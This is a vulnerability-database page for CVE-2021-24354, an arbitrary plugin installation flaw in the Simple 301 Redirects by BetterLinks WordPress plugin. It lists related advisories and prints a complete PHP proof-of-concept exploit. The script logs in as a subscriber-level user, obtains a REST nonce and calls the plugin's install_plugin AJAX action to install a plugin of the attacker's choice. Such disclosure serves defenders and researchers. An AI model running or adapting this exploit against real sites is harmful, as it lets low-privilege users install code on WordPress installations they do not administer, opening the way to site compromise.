Simple 301 Redirects Plugin Arbitrary Plugin Installation via WordPress REST AP
Reporter | Title | Published | Views | Family All 7 |
---|---|---|---|---|
![]() | Unspecified vulnerability in BetterLinks WordPress plugin (CNVD-2021-44289) | 16 Jun 202100:00 | – | cnvd |
![]() | Design/Logic Flaw | 14 Jun 202114:15 | – | prion |
![]() | CVE-2021-24354 | 14 Jun 202114:15 | – | nvd |
![]() | CVE-2021-24354 Simple 301 Redirects by BetterLinks - 2.0.0-2.0.3 - Arbitrary Plugin Installation | 14 Jun 202113:37 | – | cvelist |
![]() | Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Installation | 26 May 202100:00 | – | wpvulndb |
![]() | CVE-2021-24354 | 14 Jun 202114:15 | – | cve |
![]() | WordPress Simple 301 Redirects by BetterLinks Plugin < 2.0.4 Multiple Vulnerabilities | 15 Jun 202100:00 | – | openvas |
<?php
// Settings
$siteurl = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];
echo 'Logging in!';
// 1) Log in as subscriber+
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
'log' => $wp_user,
'pwd' => $wp_pass,
'rememberme' => 'forever',
'wp-submit' => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);
echo 'Getting REST API Nonce!';
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php?action=rest-nonce');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);
//Rest Nonce
preg_match('/([^"]+)/', $content, $matches);
$restnonce = $matches[1];
echo $restnonce;
echo 'Installing Plugin!';
//Installing Plugin
$ch = curl_init();
curl_setopt( $ch, CURLOPT_URL, $siteurl . '/wp-admin/admin-ajax.php' );
curl_setopt( $ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.13) Gecko/20080311 Firefox/2.0.0.13' );
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, true );
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, true );
curl_setopt( $ch, CURLOPT_POST, true );
curl_setopt( $ch, CURLOPT_POSTFIELDS, [
'action' => 'simple301redirects/admin/install_plugin',
'security' => $restnonce,
'slug' => 'jetpack',
] );
$output = curl_exec($ch);
curl_close($ch);
print($output)
?>
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo